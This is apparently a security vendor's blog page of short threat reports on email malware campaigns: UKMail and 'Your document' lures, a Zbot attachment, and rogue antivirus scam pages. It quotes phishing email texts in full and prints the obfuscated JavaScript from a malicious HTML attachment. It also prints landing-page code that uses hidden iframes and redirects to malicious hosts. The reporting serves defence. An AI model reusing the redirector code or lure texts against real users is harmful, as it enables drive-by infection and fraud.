New Excel malware: UKMail 988271023 tracking information from no-reply@ukmail.com


MX Lab, http://www.mxlab.eu, started to intercept a new trojan distribution campaign by email with the subject “UKMail 988271023 tracking information”.

This email is send from the spoofed address “no-reply@ukmail.com” and has the following body:

UKMail Info!
Your parcel has not been delivered to your address November 23, 2015, because nobody was at home.
Please view the information about your parcel, print it and go to the post office to receive your package.

Warranties
UKMail expressly disclaims all conditions, guarantees and warranties, express or implied, in respect of the Service.
Where the law prevents such exclusion and implies conditions and warranties into this contract,
where legally permissible the liability of UKMail for breach of such condition,
guarantee or warranty is limited at the option of UKMail to either supplying the Service again or paying the cost of having the service supplied again.
If you don’t receive a package within 30 working days UKMail will charge you for it’s keeping.
You can find any information about the procedure and conditions of parcel keeping in the nearest post office.

Best regards,
UKMail

The attached file 988271023-PRCL.xls 118 kB large Excel file with embedded malicious macro script that will download a trojan from a host.

The malware is known as LooksLike.Macro.Malware.gen!x3 (v) or X97M.Dropper.KV.

At the time of writing, 3 of the 55 AV engines did detect the trojan at Virus Total.

Use the Virus Total for more detailed information.
SHA256: 6154fd92261dd65f02dad954db7ee9950251a0c4b3a8a2f40cc9c1b714927692

MX Lab Black Friday Promotion: special price per user and 60 days extra


MX Lab Black Friday Promotion!

Make use of our special MX Lab Black Friday promotion and benefit of a low price per user and a 60 days extra free email security services added to your 12 month subscription which includes:

  • Zero hour anti virus to protect against the latest viruses and threats
  • Managed anti spam to get rid of the unwanted emails
  • And email archiving with a 60 day retention policy as a standard

More information can be obtained on our web site or contact us directly with your questions.

Request your free trial today!

Emal “Your document” contains trojan Trojan-Spy.Zbot


MX Lab, http://www.mxlab.eu, started to intercept a new trojan distribution campaign by email with the subject “Your document”, send from spoofed addresses and has the following ver short body:

To view your document, please open attachment.

The attached ZIP file has the name document_8608003.pdf.zip and contains the 196 kB large file c3.exe.

The trojan is known as Trojan-Spy.Zbot, W32/Risk.QSAW-8224, Luhe.Fiha.A or PE:Malware.FakePDF@CV!1.9C3A.

At the time of writing, 5 of the 54 AV engines did detect the trojan at Virus Total.

Use the Virus Total permalink for more detailed information.
SHA256: b7e768d540e63e06139dc2dd194dda47b3a2712cb27b1d173127a7801ac88e88

Resume emails with attached file Resume.html leads to rogue AV software


MX Lab intercepts emails with the subject Resume, an attached file Resume.html and a very short email body:

Attached, please find

The attached HTML file contains the following code:

<SCRIPT LANGUAGE=”Javascript”><!–
//
function xhtmldecode(x){
document.write(unescape(x))
}
function runit(){
x=”%3C%6D%65%74%61%20%68%74%74%70%2D%65%71%75%69%76%3D%22%
72%65%66%72%65%73%68%22%20%63%6F%6E%74%65%6E%74%3D%22%30%3B
%75%72%6C%3D%68%74%74%70%3A%2F%2F%77%69%6D%62%65%72%74%2E%
6E%6C%2F%78%2E%68%74%6D%6C%22%3E%0D%0A”
xhtmldecode(x)
}
runit()
//–>
</script>

<SCRIPT LANGUAGE=”Javascript”><!–//function xhtmldecode(x){document.write(unescape(x))}function runit(){x=”%3C%6D%65%74%61%20%68%74%74%70%2D%65%71%75%69%76%
3D%22%72%65%66%72%65%73%68%22%20%63%6F%6E%74%65%6E%74%3D%
22%30%3B%75%72%6C%3D%68%74%74%70%3A%2F%2F%77%69%6D%62%65%
72%74%2E%6E%6C%2F%78%2E%68%74%6D%6C%22%3E%0D%0A”
xhtmldecode(x)}runit()//–></script>

When opening the attached HTML file you are directed to a web site witht he following code:

PLEASE WAITING 4 SECOND...
  <meta http-equiv="refresh" content="4;
url=hxxp://brocuphdislock.cz.cc/scanner10/?afid=24">
</head><body>

<iframe src="hxxp://cherrysolo.ru:8080/index.php?pid=10"
style="visibility: hidden;" height="1" width="1"></iframe>
</body></html>

After 4 seconds you will get redirected to hxxp://brocuphdislock.cz.cc/scanner10/?afid=24. On our Mac computer we got the following screen.

It stayed like this for quite a while so I guess that the scripting of this site doesn’t work too well on a Mac computer. At MX Lab, we believe that this is a new campaign to distribute the rogua anti virus software antivirus_24.exe as mentioned in earlier blog articles:

Campaign with emails that lead to rogue AV software antivirus_24.exe continues
Malicious emails lead to rogue AV software antivirus_24.exe

Malicious emails lead to rogue AV software antivirus_24.exe


MX Lab intercepted emails that leads to the rogue anti virus software with the executable antivurs_24.exe. The senders make use of well known brand names like Macy’s, Costco Photo Center and perhaps also other brands as well.

The URLs inside the message lead to a web site that hosts a malicious script and will offer you the option to download antivirus_24.exe later on.

When following this URL on our Mac we got the message “PLEASE WAITING 4 SECOND…”.

The web site has the following HTML code:

PLEASE WAITING 4 SECOND...
  <meta http-equiv="refresh" content="4;
url=hxxp://hoopdotami.cz.cc/scanner5/?afid=24">
</head><body>

<iframe src="hxxp://baymediagroup.com:8080/index.php?pid=10"
style="visibility: hidden;" height="1" width="1"></iframe>

</body></html>

We got the following screen below but I’m sure that on Windows it will be slightly different. Some Windows icons will be included of your hard drives and so on.

You will get to see some errors, your system is infected and the instructions lead you to download the malware. This part is obviously fake so please do not continue the process.

Virus Total permlink and MD5: 5be4b708a68687cb5490fe2caea49c82

MX Lab Summer Sales, only €8 per mailbox per year!


MX Lab is offering the Zero Hour Anti Virus and Managed Anti Spam for your mail server for € 8 per mailbox per year. For more information visit http://www.mxlab.eu/ and contact us.

Rogue online anti virus scanner Antivirus Plus


Antivirus Plus is a rogue anti virus scanner. When visiting an URL like hxxp://myreallyty.com/su/in.cgi?18 – something I don’t recommend to do at home – an online virus scanner is started to check your computer system. It won’t take long before the first viruses, malware and trojans are detected.

The online virus scanner gives you the warning that you have several infections: I-Worm.Sobig, TrojanDropper.JS.Mimail and Backdoor.SdBot.gen being one of the most critical infections according to Antivirus Plus.

 

Antivirus Plus will soon gives you the warning that it can’t clean your computer and offers you the option to download additional software to do so.

The file Installer_70137.exe is downloaded and is known as:

Win32:Trojan-gen (Avast)
Trojan.Win32.Agent2.gnf (F-Prot, Kaspersky)
TrojanDownloader:Win32/Renos.BAO (Microsoft)
Troj/FakeAV-NT (Sophos)

Virus Total permlink and MD5: 916e0f7aef7f1ea6308fa886d41ed750.

Follow

Get every new post delivered to your Inbox.

Join 1,582 other followers